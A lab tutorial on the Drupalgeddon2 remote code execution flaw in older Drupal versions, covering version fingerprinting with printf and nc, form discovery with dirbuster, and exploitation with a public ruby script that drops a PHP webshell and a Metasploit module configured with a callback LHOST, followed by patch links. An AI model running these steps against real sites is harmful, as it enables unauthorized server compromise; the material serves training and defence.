What is it?:
A remote code execution vulnerability exists within multiple subsystems of Drupal before versions 7.58, 8.3.9, 8.4.6, and 8.5.1 with default or common module configurations. This vulnerability can give attackers the ability to exploit multiple attack vectors on a Drupal site. If an attacker takes advantage of this vulnerability, it could result in a compromise.
Identification:
A quick note about the VM before starting the lesson. If you wish to interact with the Drupal web server running on the VM it is available on port 8080.
When identifying whether or not a site is vulnerable to this CVE there are two factors attackers need to take into consideration. The first factor is the version of the Drupal the server is running. The second factor is whether or not the web page has the proper attack surface. How does one determine what version of Drupal is running and what exactly is the appropriate attack surface?
There are a few different ways of identifying the version of the web page. If an attacker wanted to identify the web page version without using any tools, they could do this by viewing the web page's source code or documents stored on the web server. To view the source code press CTRL+u, on most browsers doing this will display the code in a new tab. After opening the source code, find the line that starts with "<meta name="Generator" " to identify the Drupal version. See image 1.1 for an example of the source code and this line.
1.1
As you can see in image 1.1 we discovered this server is running version 8 of Drupal. Another way of identifying this information without tools is by browsing to the page /core/changelog. After browsing this page, we can validate our findings from the source code. Image 1.2 is an example of what information is present on this page.
1.2
If you want to utilize a tool for identifying what version of Drupal is running a combination of printf and nc can be used to extract the needed information. This can be done with the command printf "HEAD / HTTP/1.0\r\n\r\n" | nc -n -i 1 172.17.0.3 80. See image 1.3 for an example of this command being run and the line identifying what version of Drupal is running.
Now that we have identified a variety of version 8 is running, the next step is to find the proper attack surface. But what is the appropriate attack surface? For this CVE, the right attack surface is an unauthenticated form. Forms such as login and register forms, or a password reset form would be considered unauthenticated. TO identify these forms, we can either browse the page manually or utilize a tool such as dirb. If we manually browse this web site, we can stumble across the register new user form by clicking "login" at the upper right-hand corner and then selecting the "Create new account" tab on the login page. See image 1.4 for an example of this page.
1.4
If you want to use an automated tool to find a registration form or password reset form, dirbuster would be a fantastic option. Dirbuster is easy to use and is a default Kali tool to launch this tool type dirbuster in the terminal to launch the program. Once it has launched, type your desired target into the "Target URL" field and select a wordlist you want the tool to use. If you are using Kali, you can find your wordlists in the "/usr/share/wordlists/" directory. After you have selected your wordlist, click the start button on the bottom right-hand corner. See image 1.5 for an example of this tools setup step.
1.5
Now that we have launched the tool, dirbuster will iterate through the wordlist, trying to identify directories and pages based on the server responses. While running dirbuster we were able to identify a user login page and a user registration page. Once these pages were found, we stopped dirbuster. If we had let the tool proceed, it would have found additional assets. Image 1.6 is an example of what it looks like when a web server sends a 200 response that identifies a web page or directory being present.
1.6
Since we have identified what version is running and an appropriate attack service, we will move onto the next step, and what step is that? That's right; it's EXPLOITATION TIME!
Exploitation:
For the exploitation phase, we are going to use two different tools. The first is a ruby script found on github, which can be found in the lab files. The second tool we will be covering a Metasploit module.
When researching a CVE you can use github to find scripts to exploit or identify your CVE. Since we could manually identify the CVE, we did not use github to find a script to scan for Drupalgeddon2. We did however, search for a script we could use for exploitation. Usage for this script is straightforward; the command would be ruby drupalgeddon2.rb <target>. For example, our usage is ruby drupalgeddon2.rb 192.168.1.49:8080. We add 8080 at the end of our IP because, for the lab VM the drupal server is running on port 8080. As you can see, image 1.7 this tool steps through the identification phases, and once it has identified if the target is vulnerable, it will upload a PHP webshell. After the shell is uploaded, the attacker is presented with an interactive terminal.
1.7
The ruby script we provided gives users limited capabilities with its PHP webshell. Maybe you want to use a tool that will give you a bit more options. For that, we turn to Metasploit and its many modules and post-exploitation capabilities. To use the exploitation module, we first need to know the path for it to select it as the active tool. Finding this information can be done by running the search command with the term Drupalgeddon2. Image 1.8 shows an example of the search command being run and its results. Metasploit has informed us that we can use one module, which is exploit/unix/webapp/drupal_drupalgeddon2.
1.8
After identifying which module we want to use, we need to set our module as active, and we need to set any additional options. To make our module active, we use the command "use exploit/unix/webapp/drupal_drupalgeddon2", which will tell Metasploit this is the module we wish to use. As you can see in image 1.8, after using this command, our console now displays "exploit(unix/webapp/drupal_drupalgeddon2)" in the CMD line to inform us the module is active.
Next we run the "show options" command to identify any options that need set. Running the "show options" command for this module tells us we need to set the "RHOSTS" option. Additionally, we will change the "RPORT" option since the webserver is running on port 8080. To do this, run the command "set rhosts Target" and replace the word Target with your target's IP or URL information. Next, run the command "set rport 8080". Lastly, we will set our "LHOST" to define what IP we want a payload to use for its call back. The command we will use for setting our "LHOST" option is "setg lhost 192.168.1.53”. Using the "setg" command defines a global variable and lets Metasploit choose a payload for you. You can manually select a payload, but for this lesson we will let Metasploit pick the best one for us. Once this is complete, you can run your module by typing the command "run" in the console and pressing enter. See image 1.9 for an example of setting the "RHOSTS", "RPORT", and "LHOST" options and running the module.
1.9
Congratulations, you've exploited this lab. Now that you know the basics of identifying and exploiting this vulnerability get out there and hack the planet!
Mitigation:
If you are running Drupal 7 before version 7.58, upgrade to Drupal 7.58 or apply this patch https://git.drupalcode.org/project/drupal/commit/2266d2a83db50e2f97682d9a0fb8a18e2722cba5.
If you are running Drupal 8.3.x before version 8.3.9, upgrade to Drupal 8.3.9 or apply this patch https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f.
If you are running Drupal 8.4.x before version 8.4.6, upgrade to Drupal 8.4.6 or apply this patch https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f.
If you are running Drupal 8.5.x before version 8.51, upgrade to Drupal 8.5.1 or apply this patch https://git.drupalcode.org/project/drupal/commit/5ac8738fa69df34a0635f0907d661b509ff9a28f.